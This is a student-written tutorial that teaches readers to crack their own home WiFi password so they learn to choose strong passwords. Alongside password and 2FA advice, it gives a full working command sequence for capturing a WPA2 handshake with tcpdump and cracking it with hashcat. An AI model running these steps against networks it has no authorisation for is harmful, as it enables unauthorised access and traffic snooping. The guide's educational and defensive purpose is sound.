Team Cracked: Henry Samuelson, John Stawinski, Luca Koval, Shihao Cao
The purpose of this tutorial is to provide a user guide that will walk users through the process of hacking WiFi. It is intended for anyone and everyone. You do not need any previous technical experience to understand this guide. We hope this guide will provide users with a better understanding of how to create good passwords.
Before we proceed, it's important to note that this guide is intended only for use on your own, home WiFi network over which you have ownership or on a network for which you have explicit permission from the owner to hack. Only perform the hack demonstrated in this guide on such a network. Do not perform the hack demonstrated in this guide on someone else's network, a public network, or anything else of that nature. We, the creators of this guide, take no responsibility for actions taken by you, the user. We mention this in a few other places in the guide as well. We apologize for the tedium, but it is important to say.
The next section goes through some background information for the problem we are trying to solve. It gives context for the guide and provides its exigence. If, however, you'd like to go directly to the tutorial section, click here!
How can you contain the damage done by a successful hack? How can you recover?
If you suspect you are being hacked, it is important to know whether your physical device is compromised or your online account (such as email) is compromised.
If your physical device is compromised, disconnect it from the internet, or unplug your router.
If your physical device is compromised, the attackers are likely controlling it over the internet. Disconnect it from the internet to stop it from being remotely controlled. The best path forward is then to wipe the computer completely with a full reinstall, saving no data. This wipes any code the hackers could have deployed during the hack. If you are going to restore the computer from a backup, make sure the backup predates the time you suspect you were compromised.
If your online identity/account is compromised, immediately change your password if possible, and call/contact customer support or the fraud team.
It is crucial to change your password as soon as you are hacked. This prevents the attackers from changing your email or phone number, which is often all that links you to your account. Then sign out of all devices, and sign back in using the new password. This kicks hackers out of all your other sessions. Next, call the customer service or fraud teams of the companies whose accounts were compromised, report the compromise to them, and ask them to help make sure your account is safe.
If your email is compromised, this is incredibly dangerous. Until you are certain that you have control over it again, switch all your important accounts over to another email that you know you control. This gives you protection and isolation until you are certain you are safe again.
Different passwords for different services contain the damage from any one hack.
As has been briefly mentioned in this guide, one of the root causes of bad password security is people creating passwords that they can easily remember. While this is good for ease of use, it is bad for password security. Often, these easy-to-remember passwords are also easy to crack. However, this ease-of-use blunder extends past creating a single password: it infects all passwords. Another side effect of trying to create passwords that are easy to remember is that users will often use the same password across many, if not all, of their online accounts [9]. If you have one password that you can remember easily, why not use it everywhere! That's SUPER easy to remember! No need to keep track of 50 different passwords for different sites. Life just becomes simpler. Or at least it does until you get hacked.
Let's say you, quite unfortunately, fall victim to a successful password hash-cracking attack for a password that you use on one of your accounts. Clearly, that account is now compromised. However, if you use that same password to protect a second account on another website, that second account is compromised as well. If you use the same password for all your accounts, ALL your accounts are compromised. Instead of having to crack 10 or 20 passwords to access all of your digital data, an attacker only has to crack one. This makes their job so much easier and makes your life so much harder.
If, however, you use different passwords for all your online accounts, a successful attack on one of those passwords does not affect your other accounts [10]. The damage is mitigated and contained, at least for the moment, to that one compromised account. This makes recovery much easier as well: instead of having to lock down all of your accounts and keep track of all the damage that was done, you only have to focus on one account.
If you're hacked, you want to know about it, and fast!
While this is all happening, pay attention to phone notifications, recent history, emails (including emails in the trash), transaction histories, and more, on all your important accounts. If you notice suspicious activity, take action to secure your accounts. Attacks are often subtle and can spread from account to account.
If the above sounds stressful, it's because it is. It is a much better idea to be preventative in the security space rather than reactive.
It's important to have these notifications so that you not only know when you are being hacked, but know as soon as possible. So first off, make sure you have these notifications enabled for all your accounts. Not all accounts may offer an option to turn them on, and some may not have such notifications at all, but you should always search your account settings for the option to turn them on.
Often these notifications come in the form of emails and cover a few different types of events, usually related to login attempts or successful logins. The service on which you have an account will often send you an email if it deems the attempt or successful login to be suspicious. The email should contain details about the login, such as time, date, and location, as well as ways to act against the suspicious login. If the login was from you, then no problem! If it wasn't, then you know you've been hacked.
We've said it before, but we'll say it again because it's that important: if one of your accounts is unfortunately hacked, CHANGE THE ASSOCIATED PASSWORD. The password is often the one way in that the hacker has, so if you close the door and change the lock, the hacker cannot get back in. Just make sure that when you change your password, you make it more complex. (More on that in Good Password Security, in the Use complex passwords section.)
What are the takeaways?
Now that you know how to crack a WiFi password, you can start to think about the mechanics of how hacking really works. Hacking is not mysterious bits of information floating down a screen in green text. There are tangible steps taken by real people every day to try and infiltrate and break into your systems.
By knowing the intimate processes that a hacker could take, you will know the tangible actions you can take to put roadblocks in the way of hackers.
In the case of passwords, making a complex password, utilizing special symbols, mixed-case, numbers, and making use of length, reduces the likelihood your password is in a given password list [12]. This makes it infeasible to guess your password within a reasonable time frame.
Moving beyond passwords though, you now also have a better understanding of online security. So much of your information is stored online, and most of it is protected by just a password. That single line of defense between you and any nefarious hackers out there is vital. So please, create strong passwords!
When websites recommend how to use a more complex password, heed their advice. You’ve now seen first-hand how easy it can be to crack a password. Make sure it doesn’t happen to you, and step by step, we move towards a safer online world.
Lastly, online security is an ever-changing world. You should continue to stay up to date on the latest security practices, and consider using 2-factor-authentication as another tier of security beyond strong passwords [6]. Know that being safe with your passwords is just one piece of the puzzle, one link that hackers can attack. It is up to all of us to be vigilant about our online security practices, and to keep seeking knowledge about what's going on in the world of computer security.
Who did we cite?
[1] “Cyber attacks becoming more frequent and severe – survey - Document - Gale OneFile: News,” PanARMENIAN.Net, 21 June 2011. [Accessed: Mar. 07, 2022].
[2] P. Tarwireyi, S. Flowerday, and A. Bayaga, “Information security competence test with regards to password management,” in 2011 Information Security for South Africa, Johannesburg, South Africa, Aug. 2011, pp. 1–7. doi: 10.1109/ISSA.2011.6027524.
[3] G. Delnevo, L. Deluigi, D. Evangelisti, and S. Magnani, “On increasing password security awareness using a serious game,” in 2022 IEEE 19th Annual Consumer Communications Networking Conference (CCNC), Jan. 2022, pp. 82–87. doi: 10.1109/CCNC49033.2022.9700539.
[4] H. S. Venter and J. H. P. Eloff, “Data packet intercepting on the internet: How and why? A closer look at existing data packet-intercepting tools,” Computers & Security, vol. 17, no. 8, pp. 683–692, Jan. 1998, doi: 10.1016/S0167-4048(98)80099-0. [Online]. Available: https://www.sciencedirect.com/science/article/pii/S0167404898800990. [Accessed: Mar. 09, 2022] Venter and Eloff discuss the formation of TCP/IP datagrams that form the basis of segmented communication, and how its architectures lead to attacks that can intercept some or all of the data. Venter and Eloff thus discuss the uses and methodologies of intercepting packets.
[5] C. Ntantogian, S. Malliaros, and C. Xenakis, “Evaluation of password hashing schemes in open source web platforms,” Computers & Security, vol. 84, pp. 206–224, Jul. 2019, doi: 10.1016/j.cose.2019.03.011. [Online]. Available: https://www.sciencedirect.com/science/article/pii/S0167404818308332. [Accessed: Mar. 09, 2022]
[6] D. Nield, “How two-factor authentication keeps your accounts safe,” Wired, 12-Jul-2020. [Online]. Available: https://www.wired.com/story/protect-accounts-two-factor-authentication/#:~:text=When%20you're%20setting%20up,be%20able%20to%20log%20in. [Accessed: 08-Mar-2022]
[7] M. Agarwal, S. Biswas, and S. Nandi, “Detection of De-Authentication DoS Attacks in Wi-Fi Networks: A Machine Learning Approach,” in 2015 IEEE International Conference on Systems, Man, and Cybernetics, Oct. 2015, pp. 246–251, doi: 10.1109/SMC.2015.55. Agarwal, Biswas, and Nandi discuss how the rapid adoption of wireless standards, quickly pushed for encryption of data frames, but did not push for encryption of the authenticate and deauthenticate packets. They discuss the mechanics of attacking this lack of encryption, as well as mitigation strategies.
[8] R. Hranický, L. Zobal, O. Ryšavý, and D. Kolář, “Distributed password cracking with BOINC and Hashcat,” Digital Investigation, vol. 30, pp. 161–172, Sep. 2019. Hranický, Zobal, Ryšavý, and Kolář study how hashcat can be used to crack passwords as fast as possible by using graphical processing units and a “distributed hashcat” system.
[9] T. Bell, “The importance of using different passwords,” ACUTEC, 02-Feb-2022. [Online]. Available: https://www.acutec.co.uk/blog/the-importance-of-using-different-passwords/. [Accessed: 28-Apr-2022].
[10] M. Burgess, “How to know if you've been hacked, and what to do about it,” Wired, 19-Jul-2020. [Online]. Available: https://www.wired.com/story/how-to-know-if-youve-been-hacked-and-what-to-do-about-it/. [Accessed: 28-Apr-2022].
[11] D. Arias, “Adding salt to hashing: A better way to store passwords,” Auth0, 25-Feb-2021. [Online]. Available: https://auth0.com/blog/adding-salt-to-hashing-a-better-way-to-store-passwords/. [Accessed: 27-Apr-2022].
[12] P. Navor, “The effects of password length and complexity on password resiliency,” University of Hawaiʻi - West Oʻahu, 01-Nov-2021. [Online]. Available: http://hdl.handle.net/10790/6830. [Accessed: 08-Mar-2022].
Heya there!
Many people disregard advice when it comes to creating good passwords, and in doing so endanger the security of the plethora of their own personal information stored online. Instead of directly telling people how to create better passwords, which has been tried many times before, we give users a hands-on experience that shows them how easy it is to break passwords, especially those that are subpar. We do this by teaching users how to hack. Specifically, this guide walks users through the process of hacking their own, home WiFi.
As humanity’s reliance on electronic media has increased, the threats to our online security have increased as well. While information used to be stored in some sort of physical medium, almost all information today is stored online. Bank accounts, financial records, social media, and health information are all kept in digital databases.
To many, this provides great comfort. An almost infinite amount of information is instantaneously accessible and transferable. On the other hand, this ease of accessibility proves to be a great risk to all involved. Day after day, individuals or groups known as “hackers” try to access digital information that does not belong to them. It could be to expose someone. It could be to gain leverage for manipulation and/or monetary gain. Regardless, the cyber attacks these hackers execute across the world are becoming more and more common [1].
Most of the time, the only obstacle between your private information and your hard-earned money is a simple password. This barricade can be quite effective when used properly, but most of the time, it is not. Many people do not create and use secure passwords [2], instead favoring insecure passwords that are easy to remember. Using these weak passwords leaves their information vulnerable to attack from hackers [3].
Passwords are stored in a hashed form (a one-way scrambling of the password, not reversible encryption), and if a hacker obtains the hash of an insecure password, they can crack the hash offline, i.e. right on their own laptop without being connected to any sort of network, by guessing candidate passwords and checking which one produces the same hash. Once the hash is cracked, the hacker knows the password. Furthermore, people who do create strong passwords may still be at risk: even passwords created according to previous industry standards can be cracked offline in under ten minutes [4][5].
What constitutes a strong password? Is it a combination of numbers and characters, length, or something else? In truth, they all come together to reduce the likelihood that they could be guessed in a brute force or lookup attack [6], the most common ways hackers attempt to crack password hashes. We want to help users understand the risks involved with using insecure passwords so that they may increase their personal password security and create stronger passwords.
We believe giving users a hands-on look into a common type of cyber attack will increase their understanding of online security issues and inspire them to create better passwords. One of the easiest and most accessible interfaces to hack is WiFi. The ever-increasing prevalence of WiFi has led to an increase in the popularity of WiFi attacks [7]. Password-protected networks can be abused in order to get free WiFi, listen to a victim’s internet traffic, snoop around on an internal network, and much more.
It is important that we lay out the scope of this guide. It does not teach you everything about hacking, but it does lay down a great foundation to get started. As a reminder, the scope of this guide is limited to teaching users how to crack the WiFi password of their home WiFi network.
Further, for this guide, we work within the constraints listed below in order to maintain brevity of the guide:
Another user is already connected to the target network.
The target network is secured with a relatively weak password that appears in the wordlist used for the hash lookup.
We choose to only make this guide available to Mac users as that is a common platform.
We choose to take advantage of already existing tools to automate otherwise lengthy processes.
This guide is intended only for use on your own, home WiFi network over which you have ownership or on a network for which you have explicit permission from the owner to hack. Only perform the hack demonstrated in this guide on such a network. Do not perform the hack demonstrated in this guide on someone else's network, a public network, or anything else of that nature. We, the creators of this guide, take no responsibility for actions taken by you, the user.
How can you ACTUALLY be more safe online?
Now that you know how to crack a password, what can you actually do to prevent those types of attacks? What can you do to mitigate the damage done from those types of attacks? We went through some of this in the Conclusion section, but we will go into more detail here.
Complex passwords are harder to crack.
The first and most direct way to prevent password hash-cracking attacks is by using complex passwords. A password like "123456" will be cracked essentially instantly. Hopefully you've seen through this guide that many passwords can be cracked in a similar time. By increasing the complexity of your password, you make it much more likely an attacker will fail to crack your password. In terms of what we showed in this guide, increasing the complexity of your password makes it less likely your password will show up in a common-passwords text file used to crack password hashes. Some attacks are a bit more complex and either use larger password text files or sequentially go through every password combination up to some length. This latter type of attack takes longer, but is more likely to crack your password's hash. Increasing your password length, however, which is part of increasing password security, makes it exponentially more likely that such a sequential attack will fail. Or, if the attack doesn't fail, it may simply take years to complete.
Longer passwords are stronger passwords.
Okay, so increasing password complexity is good, but what does that actually mean? Well, we've already mentioned one type of increase in complexity: Increase in password length. Again, increasing password length makes it more likely your password will not be included on a common passwords list and more likely that your password will not be cracked in a sequential type of attack. These advantages are the same across all types of actions that increase password security.
Another main way of increasing password security is varying the types of characters used in your password. In addition to the password "123456" being horribly short, it uses only one type of character: Numbers. A more complex password would include not only numbers, but alpha characters and special characters as well. Alpha characters are just letters, and special characters are characters like exclamation point ("!"), the "at" symbol ("@"), and tilde ("~").
Warning: Some websites do not allow certain special characters. This is unfortunate as it limits your ability to create complex passwords, but there are usually many special characters left over to play with.
Often when people are forced by a website to include special characters, they will simply add an exclamation point at the end of their password. While this does increase the complexity of your password somewhat, it is still fairly common.
Special characters, while combatting the sequential attacks, are even better for combatting the password list attacks. The password lists are often long lists of common passwords, so including special characters, which are not as commonly used, makes your password less common. At least that is the case if the special characters are used correctly.
So how can you overcome this? Simple! Just vary how you use your special characters. Maybe throw one in the middle of your password where no one would expect it. Maybe replace a letter with a number for no apparent reason whatsoever. It may make your password harder for you to remember, but it makes the password harder to crack, too. (There are also many applications out there that securely store your passwords. We unfortunately will not go into those in this guide, but feel free to research them on your own!) This is one reason the passwords suggested by your computer, at least on Mac, are unintelligible messes: they're complex!
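To make the two kinds of attack discussed above concrete, here is an added example (not part of the original guide) that models them for a WiFi password: a wordlist lookup, which derives the WPA2 key for every candidate in a list and compares it, and a sequential attack, whose worst-case cost grows with the number of character classes and the length. The wordlist, the SSID "HomeNet" and the derivation rate of one million candidates per second are constructed assumptions, not measurements.

```python
import hashlib
import string

# Constructed stand-in for a wordlist such as rockyou.txt (assumption: the real
# list has millions of entries; these are just typical examples).
WORDLIST = ["123456", "password", "iloveyou", "sunshine!", "qwerty123"]

# The character classes the guide discusses: numbers, letters, special characters.
CLASSES = {
    "digits": string.digits,
    "lower": string.ascii_lowercase,
    "upper": string.ascii_uppercase,
    "special": string.punctuation,
}


def wpa2_pmk(passphrase, ssid):
    """Derive the WPA2 Pairwise Master Key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the work a cracker has to repeat for every single guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wordlist_attack(target_pmk, ssid, wordlist):
    """Offline lookup attack: derive the key for each wordlist entry and compare.
    Returns the matching passphrase, or None when the password is not in the list."""
    for candidate in wordlist:
        if wpa2_pmk(candidate, ssid) == target_pmk:
            return candidate
    return None


def classes_used(password):
    """Which character classes appear in the password."""
    return {name for name, chars in CLASSES.items() if any(c in chars for c in password)}


def keyspace(password):
    """Number of candidates a sequential (brute-force) attack must cover to be
    guaranteed to reach a password of this length built from these classes."""
    alphabet = sum(len(CLASSES[name]) for name in classes_used(password))
    return alphabet ** len(password)


def brute_force_years(password, pmk_per_second):
    """Worst-case duration of a sequential attack at the given derivation rate
    (the rate is an assumption; real cracking rigs vary widely)."""
    return keyspace(password) / pmk_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    ssid = "HomeNet"  # constructed SSID
    for pw in ("sunshine!", "Tr0ub4dor&3x!Q"):
        hit = wordlist_attack(wpa2_pmk(pw, ssid), ssid, WORDLIST)
        print(f"{pw!r}: wordlist {'found it' if hit else 'missed'}, "
              f"classes={sorted(classes_used(pw))}, "
              f"sequential attack ~{brute_force_years(pw, 1e6):.3g} years at 1e6 keys/s")
```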
2-Factor-Authentication adds an additional link that hackers must compromise.
2-Factor-Authentication (2FA) is a class of methods that add a second factor, often requiring physical interaction, in order to log in. These range from texting an additional code to your phone, to plugging in a physical key (often USB) that carries a special cryptographic identifier. In those cases, the hacker would also need to compromise your phone or cell carrier, or physically steal your key, in order to log in. This makes it orders of magnitude harder to compromise your account. Of course, this all only works if you sign up for or enroll in such services. It is highly recommended that you enroll in 2FA on all your important identity and banking-related accounts.
Some people will try and trick you into giving them your password.
Social engineering may sound fancy, but all it really means is a con. Someone tries to convince you to give them or somehow reveal your password so that they can use it for nefarious purposes. One popular way hackers try this is by pretending to be from some service on which you have an account. They may email you or call you saying that they need your username and password to fix something wrong with your account. Do not trust this. They are trying to steal your password. It is always best to check these "issues" first on your own. If they truly exist, then you can contact the appropriate people to fix them. Otherwise, the issue is fake, and someone just tried to steal your password.
Even if you trust the person, simply having your password out there is a risk
Related to the social engineering point, sharing your password is also bad. Sometimes this may be necessary, especially for any kind of family account arrangement, so try and limit it as much as possible. Even if you are giving your password to someone whom you trust, giving someone your password creates another access point for hackers to find your password. Maybe that person whom you trust writes your password down somewhere insecure. It's not malicious, but it creates another opportunity for your password to be stolen.
Public WiFi is available to anyone, including hackers. This makes the networks dangerous.
As we've talked about, there are many WiFi networks out there. You can open up your laptop right now and probably find at least 10-20 networks in range. Some are better than others. "Free" WiFi or "public" WiFi, like the WiFi you would connect to at a Starbucks or an airport, are not great from a security perspective. They often have no password associated with them, so anyone can join. This is fantastic from a practical/service perspective in that anyone who happens to be at the venue can surf the web. This also means, however, that any hacker can join the network and go about malicious activities.
As with sharing your password, sometimes connecting to public WiFi is unavoidable. Sometimes your device may connect automatically! If you must use public WiFi, try your hardest to not transmit sensitive data over the network. This means avoid logging in to any service, which often includes submitting your password and username/email for that service, submitting your credit card information, your address, etc.
Keeping your passwords dynamic keeps hackers on their toes.
Even if you follow all of the above steps, it is still possible for you to get hacked. An attacker could still somehow find the hash of one of your passwords and begin to crack that hash. Is there anything else we can do?
The answer is, "Yes." Remember that more complex passwords take much longer to crack, sometimes on the order of months to years if the passwords are good enough. Given enough time, however, a hacker will still crack that password. But what if the hacker could never get in the door because the lock kept changing? That is what you do to hackers when you change your passwords every so often. (This could be every few months to every year. It's up to you, but changing your passwords on some frequency is better than not changing them at all.)
Does this take more effort? Yes, it does, especially when you do it correctly, which entails never repeating passwords. (If you repeat a password, it's possible a hacker cracked it the first time around, had the lock changed on them, and was simply waiting for & hoping the lock would be changed back. Congrats! If you repeat a password, you've just granted that hacker their wish.)
In the end, however, it is worth the effort. Getting hacked is no joke, and although it is a pain to deal with, it is possible to mitigate the damage. Go to the next section for more on that!
This is where we will teach you how to hack your WiFi. We will walk you through the necessary installations and then show you how to execute the attack.
Let's actually hack some WiFi! The next two sections run through the directions for executing the attack. The first section goes through all the installations you'll need before successfully carrying out the attack. (All the installations we step you through are entirely free. No need to worry about purchasing anything!) The second section guides you through the attack itself.
Additionally, there is a complete video walkthrough of the "Executing the Attack" section. This video walks through every step of a successful attack (other than installing the tools), so feel free to use it for reference! Again, make sure you perform all of the necessary installations before running the commands in the guide and in the video.
Here we will walk you through every step of the attack, explaining some of the technologies as we go. Make sure you have completed the necessary installations page before you do this!
IMPORTANT: Any time one of the steps on this page prompts you to enter a password, enter the password used to unlock your computer, and then hit enter (your password will not appear in the terminal as you type so do not worry about that).
All steps should execute instantly unless noted otherwise.
Additionally, make sure that you go through these instructions in order, as commands usually depend on the output of previous commands.
Open Terminal.
First, we are going to download a wordlist that we will use later on. The wordlist, called RockYou.txt, is a list of 1.4 million common passwords. We will use this list to try and crack the password hash later in the attack. To download and unzip the file, copy and paste this command into Terminal (note: after every command that you copy and paste, be sure to hit enter so that it runs):
wget https://github.com/praetorian-inc/Hob0Rules/blob/master/wordlists/rockyou.txt.gz?raw=true -O rockyou.txt.gz && gunzip rockyou.txt.gz
The output should look similar to this, but not necessarily identical as your environment may look different than ours. It is important to look for a "100%" somewhere in the terminal.
Execution Time: Less than one minute
Our goal is now to learn the name of the network router. We will do this using a command-line tool called airport, which lets us determine both the network name and the router's MAC address.
MAC address (Media Access Control address): a unique identifier used to identify devices on a network.
In Terminal, copy and paste this command to allow the airport binary to be recognized:
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
If prompted, enter your password and hit enter.
Determine the name of the WiFi network that you are trying to attack. A list of WiFi names can be found by clicking on the WiFi button in the upper right-hand corner of your home screen. For our example, we will be attacking the “MySpectrumWifi4B-5G” network.
Now we will use Mac’s network listening abilities to get some more information about our target network. In Terminal, copy and paste this command:
sudo airport -s
The output should look something like the figure above. If no networks were found, repeat the previous step.
Execution Time: Instant
We now need to find the actual name of the network router. The name of the network router is what we need to impersonate the router. All login attempts need to be handled by the router, so when a new person logs into the WiFi, their request will be sent to that name. We then want to intercept the encrypted login request that the user sends; this will likely contain an encrypted form of the password.
From the output of the previous step, find the BSSID of the target network. It should look like the BSSID outlined in red in the screenshot below:
This BSSID is the Mac Address (the unique identifier) of the WiFi router. We are going to save the BSSID in an environment variable that we will use later. To do this, copy and paste this command:
export BSSID=<TARGET_MAC_ADDRESS>
In our example, we would run:
export BSSID=78:29:ed:27:07:4a
Verification
If the above command worked, you should be able to now run:
echo $BSSID
And see something like the below:
Execution Time: Instant
This step will only work if someone is trying to connect to the network. Either one needs to wait for someone else to make a login attempt on the network, or one could simulate a login attempt by disconnecting and reconnecting their phone to the network.
Now we are going to use airport to disassociate from all networks. This will disconnect you from WiFi, so make sure not to close out of this guide before you are done or you will not be able to access it. To disassociate, run:
sudo airport -z
Next, we will use airport to tell our machine to listen on the channel that our target network is using. First identify the channel from the output of the first step of the previous section, Set Environment Variables:
Execution Time: Instant
Now that we have identified our target network, we will use airport to start eavesdropping on that network. To do this, run:
sudo airport -c<target_channel>
In our example, we would run:
sudo airport -c36
Now we will begin collecting packets. To do this we are going to use tcpdump, a network packet analyzer. We are going to listen for a packet, and then save that packet to a file called beacon.cap. Run:
sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i en0 -w beacon.cap
This command should complete fairly quickly, as long as there are people using the target network [4]. Look for the packet captured line:
Execution Time: Less than one minute if people are actively using the network.
Once the last command is complete, we are going to start listening for any authentication packets. These packets get sent whenever someone re-authenticates to a network. (This happens any time someone goes from being not connected to the WiFi to being connected.) To listen for these packets, run:
sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en0 -w handshake.cap
This will not complete immediately, so wait and move on to the next step. When the above command does terminate, it will save the authentication packets in a file called handshake.cap. Within this file will be the hash of the WiFi password that we will try to crack [7].
Execution Time: See Step 7
In order to make the last command terminate, we need to figure out a way to get someone to connect to the network. This is where it gets fun. In a real attack scenario, the attacker would just wait until someone entered the house. When doing this on your own home, you can think of creative scenarios to convince your friends to disconnect and then reconnect to the WiFi. Or, if you want to be boring and you have a device that is connected to the target network, you can just turn the WiFi off on the device, then turn it back on, and wait for the device to reconnect to the target network. When the terminal output changes from Got 0 to another number greater than zero, such as Got 4 in the screenshot below, there have been sufficient packets captured.
Once the terminal says that packets have been captured, you can kill the process by going to your terminal and pressing the control key, often abbreviated to "Ctrl", and the "C" key at the same time.
Note: At this point you are free to reconnect to WiFi.
Execution Time: This command will not terminate until someone successfully authenticates to the target network.
Now we have to merge the two capture files into one file called capture.cap. To do that run:
mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap
We must convert capture.cap into a format that our cracking tool, hashcat, can use to crack the password hash. To do this, we have to install one last tool. We will download, compile, and run the tool using this command:
git clone https://github.com/hashcat/hashcat-utils.git && cd hashcat-utils/src && make && cd ../../ && hashcat-utils/src/cap2hccapx.bin capture.cap capture.hccapx
There will be a lot of text printed to the terminal, but the last few lines should look like this:
Note that if you already had a hashcat-utils folder in the working directory, this step may not work. In that case, run the previous command starting from the "cd hashcat-utils..." section.
Execution Time: Less than two minutes.
Make sure that there was at least one WPA Handshake written to capture.hccapx, as is shown in the screenshot above. If there was not, then go back to the sudo tcpdump step of Start Listening and try again. If this still does not work, work back up the tutorial and confirm that you can successfully complete, and verify the outputs of, Wait for Reconnection and Collect Packets. If the problem persists, it may be that your WiFi authentication scheme is not vulnerable to this attack.
Once we have the hash file, we are going to try and crack it using hashcat. A hash is just an encrypted password. We are going to go through the entire list of 1.4 million passwords that we downloaded earlier, hash each one the same way, and then see if the result matches the hash that we captured. If they match, then we have cracked the WiFi password [8]! To begin this process, run:
hashcat -m 2500 capture.hccapx rockyou.txt
This process could take up to five minutes (remember, it is trying 1.4 Million passwords). If successful, the result will look like this:
Now all that is left to do is to retrieve the password! Finally, run:
hashcat -m 2500 capture.hccapx rockyou.txt --show
You should now have the decrypted password, as shown in the screenshot above.
Execution Time: Five to ten minutes.
On my network, the password was rewardbarrel058 (don’t worry, I changed it immediately after this example).
If the password attack was not successful, congratulations! You at least have a decently secure password. Keep in mind, however, that we only used 1.4 Million passwords. A dedicated cracking rig could run through over a billion attempts in a very short amount of time.
You can also add your password to the wordlist and re-run the last few steps to see what it would be like if the steps did work. To do that, run:
echo <your_password> >> rockyou.txt
where <your_password> is the password of your target network. This command appends your password to the end of the rockyou.txt file, thus adding the password to the wordlist. For example, if rewardbarrel058 was not in rockyou.txt, we would add it by running:
echo rewardbarrel058 >> rockyou.txt
Now go back and follow the tutorial from Cracking The Hash, and the password hash should get cracked!
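As an added example (not part of the original guide), here is a small Python audit that does the defensive half of what the steps above describe without touching any network: it checks whether a password appears as a line in a leaked wordlist such as rockyou.txt, and it estimates the brute-force keyspace using the one-billion-guesses-per-second figure mentioned earlier. The sample wordlist, the file names and the guess rate are constructed assumptions for the demo; on a real audit you would point in_wordlist() at the downloaded rockyou.txt.

```python
"""Audit a WiFi password against a leaked wordlist and a brute-force estimate.

Added example, not code from the original guide. Everything here is local:
no capture, no hashcat, just "is my password already on the list, and if not,
how large is the space an attacker would have to search?"
"""
import os
import string
import tempfile

# Constructed stand-in for rockyou.txt: same one-password-per-line layout.
SAMPLE_WORDLIST = "123456\npassword\niloveyou\nrewardbarrel058\nqwerty\n"


def write_sample_wordlist(directory=None):
    """Write the constructed wordlist to a temp file and return its path."""
    directory = directory or tempfile.mkdtemp()
    path = os.path.join(directory, "wordlist.txt")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_WORDLIST)
    return path


def in_wordlist(password, path):
    """True if password appears as a whole line in the wordlist at path.

    The file is streamed line by line, so a 1.4 million line list is fine;
    errors="ignore" skips the non-UTF-8 bytes leaked lists often contain.
    """
    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
        for line in fh:
            if line.rstrip("\r\n") == password:
                return True
    return False


def charset_size(password):
    """Size of the smallest standard alphabet that covers the password.

    This mirrors how a brute-force search is sized: each character class
    present (lowercase, uppercase, digits, symbols) adds its members.
    """
    classes = [
        (string.ascii_lowercase, 26),
        (string.ascii_uppercase, 26),
        (string.digits, 10),
        (string.punctuation, len(string.punctuation)),  # 32 printable symbols
    ]
    size = 0
    for members, count in classes:
        if any(ch in members for ch in password):
            size += count
    return size


def keyspace(password):
    """Number of strings a brute-force search must cover: charset ** length."""
    return charset_size(password) ** len(password)


def seconds_to_exhaust(password, guesses_per_second=1_000_000_000):
    """Worst-case time to try every string in the keyspace at the given rate.

    The default rate is the "over a billion attempts" figure the guide quotes
    for a dedicated cracking rig; it is an assumption, not a measurement.
    """
    return keyspace(password) / guesses_per_second


def audit(password, path, guesses_per_second=1_000_000_000):
    """Return a small report for one password."""
    return {
        "in_wordlist": in_wordlist(password, path),
        "charset": charset_size(password),
        "keyspace": keyspace(password),
        "years_to_exhaust": seconds_to_exhaust(password, guesses_per_second)
        / (365 * 24 * 3600),
    }


if __name__ == "__main__":
    wl = write_sample_wordlist()
    for pw in ("rewardbarrel058", "Tr0ub4dor&3", "w1fiP@ss-2019!"):
        print(pw, audit(pw, wl))
```

Read the two numbers together: a wordlist hit means the password falls in the first seconds of a run like the one above, whatever its keyspace says, because a wordlist is always tried before brute force. The keyspace figure only matters once the password is not on any list.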
In order to run the tools necessary for this attack, there are several programs that must be installed on your Mac. All of these programs will be installed from the terminal.
Terminal is a command-line application that lets you type commands for your operating system to execute. Basically, it is a way for you to talk to your Mac. We are going to use Terminal during this entire attack. If that scares you, don’t be worried. We will walk you through every step! Your grandmother would be able to follow this guide, so stick with us! To open up Terminal:
Open the "Finder" application in the bottom left-hand corner of your Mac’s home screen.
Open the "Applications" folder.
Open the "Utilities" folder by clicking on the dropdown arrow.
Double click on the "Terminal" application.
There are four tools we need to install that will be used in our WiFi attack. The first tool, Xcode, will be installed through the App Store, but the rest of the tools will be installed using Terminal.
IMPORTANT: Any time one of these steps prompts for a password, enter the password used to unlock your computer, and then hit enter. (Your password will not appear in text as you type so do not worry about that.)
The first tool we need to install is Xcode. Xcode has software development tools that we will need to install our next tool.
If you already have Xcode installed, skip below to the HomeBrew Install section.
To install Xcode:
Navigate to the “Applications” folder as described in the Opening up Terminal section.
Double click on the “App Store” icon to open the Apple App Store.
In the search bar, search for “Xcode”.
If you have not already installed Xcode, there will be a “Get” button next to the app icon. Click on this button and follow the prompts to install.
Installation Time: Depending on previous installations, Xcode could take over an hour to install. Thankfully, many people will already have Xcode installed on their Mac.
The second tool we need to install is HomeBrew. HomeBrew is a package manager (basically a tool to install other tools) for Mac that will allow you to install the last tool that we need.
If you already have HomeBrew installed, skip below to the HashCat Install section.
To install HomeBrew:
Open Terminal as described in the Opening up Terminal section.
Copy and paste this command into Terminal: ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
Press enter to execute the command.
Installation Time: Five to twenty minutes.
The last tool we need to install is HashCat. HashCat is a password cracking tool that we will use to crack the “password hash” that we will recover (more on that later).
If you already have HashCat installed, you can click on the next page to begin Executing the Attack!
We will install HashCat using HomeBrew from Terminal.
Open Terminal as described in the “Opening up Terminal” section.
Copy and paste this command into Terminal: brew install hashcat
Press enter to execute the command.
Installation Time: Two to ten minutes.
Who are we? Why should you listen to us?
I'm honestly not sure how I first got into hacking and computer security. I just remember that at some point in grade school (I think), I started looking up tutorials online for how to hack. The topics of the tutorials were all over the place, but all of it was thrilling for me to learn about. Unfortunately, many of the tutorials weren't communicated in the best manner. Looking back, it would have been really nice to have a well-organized, thoughtful, and correct tutorial for hacking. I hope we've accomplished that with this guide!
For as long as I have been interested in computers I have been interested in breaking them. I am a Computer Science major with a focus on Computer Security; a topic intimately intertwined with hacking.
This summer I will be starting at Microsoft as a Software Engineer, where I will be focusing on building security tools to detect vulnerabilities in internal code bases. These past two summers I had the privilege of interning at Microsoft where I learned how to write code to detect vulnerabilities.
